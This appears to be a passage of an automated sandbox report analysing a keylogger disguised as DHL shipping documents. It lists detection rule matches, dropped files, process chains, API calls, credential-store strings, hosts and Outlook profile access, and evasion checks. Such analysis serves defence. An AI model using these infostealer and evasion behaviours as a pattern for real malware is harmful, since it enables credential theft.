                Source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00406D5F0_2_00406D5F
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_0107791F1_2_0107791F
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_01076C9D1_2_01076C9D
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_010770B51_2_010770B5
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_010774EA1_2_010774EA
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_010767A91_2_010767A9
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_0106BFDF1_2_0106BFDF
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_0106F23C1_2_0106F23C
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_010696471_2_01069647
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_005E08B71_2_005E08B7
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_005E0A2D1_2_005E0A2D
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0040CBD12_2_0040CBD1
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0107791F2_2_0107791F
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_010770B52_2_010770B5
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0106F23C2_2_0106F23C
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01076C9D2_2_01076C9D
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_010774EA2_2_010774EA
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_010767A92_2_010767A9
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0106BFDF2_2_0106BFDF
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_010696472_2_01069647
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0105B0202_2_0105B020
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0105F3212_2_0105F321
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_010573582_2_01057358
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_010582D82_2_010582D8
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_010587382_2_01058738
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0105792F2_2_0105792F
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0105F9F02_2_0105F9F0
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01058B992_2_01058B99
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01056A592_2_01056A59
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01055DB72_2_01055DB7
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01057E782_2_01057E78
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_010530F22_2_010530F2
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_010573492_2_01057349
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_010552C72_2_010552C7
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_010552D82_2_010552D8
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0105EB982_2_0105EB98
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0105EBA82_2_0105EBA8
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: String function: 010668F0 appears 92 times
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: String function: 01064EBD appears 56 times
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: String function: 00401EE0 appears 33 times
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_010611A0 OpenSCManagerW,_fprintf,OpenServiceW,DeleteService,_fprintf,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetLastError,_fprintf,CloseServiceHandle,CloseServiceHandle,1_2_010611A0
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeReversingLabs: Detection: 43%
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeVirustotal: Detection: 37%
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeFile read: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeJump to behavior
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeProcess created: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess created: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeProcess created: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.mJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess created: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeFile created: C:\Users\user\AppData\Local\Temp\nsv9935.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@2/2
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: OpenSCManagerW,_fprintf,GetSystemDirectoryW,lstrcpyW,CreateServiceW,CloseServiceHandle,CloseServiceHandle,GetLastError,_fprintf,CloseServiceHandle,1_2_010610B0
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: OpenSCManagerW,_fprintf,GetSystemDirectoryW,lstrcpyW,CreateServiceW,CloseServiceHandle,CloseServiceHandle,GetLastError,_fprintf,CloseServiceHandle,2_2_010610B0
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
                Source: tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002D13000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002D07000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.520282991.0000000003CAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, ?u0097U??/??ufffd?ufffd.csBase64 encoded string: 'IwKBXjNRCdw8lIyWLafopbJDyfGg4tBtJpKdYfBdgZN4c/KU7p3OHgtWJM8b0KUg'
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6048:120:WilError_01
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0040147B GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,2_2_0040147B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: GetTickCount1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: Kernel32.dll1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: Sleep1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: Kernel32.dll1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: VirtualAlloc1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: Kernel32.dll1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: Embedding1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: regserver1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: unregserver1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: unregister1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: unreg1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: package1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: ACTION=ADMIN1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: uninstall1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: update1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: uiet1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: passive1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: help1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: REMOVE=ALL1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: REMOVE=ALL1_2_01061C90
                Source: tdbwdaltxz.exeString found in binary or memory: F-Stopw
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, u00ab????/ufffdzufffd?ufffd.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, ?u0097U??/??ufffd?ufffd.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, ?u0097U??/??ufffd?ufffd.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: wntdll.pdbUGP source: tdbwdaltxz.exe, 00000001.00000003.256979811.000000001A5B0000.00000004.00001000.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000001.00000003.256743149.000000001A740000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: tdbwdaltxz.exe, 00000001.00000003.256979811.000000001A5B0000.00000004.00001000.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000001.00000003.256743149.000000001A740000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_01066935 push ecx; ret 1_2_01066948
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0040D2E1 push ecx; ret 2_2_0040D2F4
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01066935 push ecx; ret 2_2_01066948
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01068008 push esi; ret 2_2_0106800A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01068314 push esi; ret 2_2_01068316
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01068363 push edi; ret 2_2_01068365
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01068409 push edi; ret 2_2_0106840B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_01061C90 LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,Sleep,_fseek,_fseek,VirtualAlloc,__fread_nolock,#17,GetCommandLineW,lstrlenW,_fprintf,lstrlenW,_fprintf,lstrlenW,ExitProcess,lstrlenW,lstrlenW,lstrlenW,CLSIDFromString,FreeLibrary,1_2_01061C90
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeFile created: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeJump to dropped file
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-14442
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_1-13240
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeAPI coverage: 3.0 %
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_005E07DA GetSystemInfo,1_2_005E07DA
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_00406715 FindFirstFileExW,2_2_00406715
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeAPI call chain: ExitProcess graph end nodegraph_1-12801
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeAPI call chain: ExitProcess graph end nodegraph_1-13331
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeAPI call chain: ExitProcess graph end nodegraph_1-12805
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeAPI call chain: ExitProcess graph end nodegraph_1-13294
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeAPI call chain: ExitProcess graph end nodegraph_2-27661
                Source: tdbwdaltxz.exe, 00000002.00000002.519032371.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_01072526 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_01072526
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_01072526 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_01072526
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_01061C90 LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,Sleep,_fseek,_fseek,VirtualAlloc,__fread_nolock,#17,GetCommandLineW,lstrlenW,_fprintf,lstrlenW,_fprintf,lstrlenW,ExitProcess,lstrlenW,lstrlenW,lstrlenW,CLSIDFromString,FreeLibrary,1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_01074D5B __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,__get_osfhandle,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_01074D5B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_005E005F mov eax, dword ptr fs:[00000030h]1_2_005E005F
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_005E017B mov eax, dword ptr fs:[00000030h]1_2_005E017B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_005E0109 mov eax, dword ptr fs:[00000030h]1_2_005E0109
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_005E013E mov eax, dword ptr fs:[00000030h]1_2_005E013E
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01057358 LdrInitializeThunk,2_2_01057358
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_0106BC59 SetUnhandledExceptionFilter,1_2_0106BC59
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_0106BC7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0106BC7C
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_00401E16 SetUnhandledExceptionFilter,2_2_00401E16
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_00401C83 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00401C83
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_004060A4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004060A4
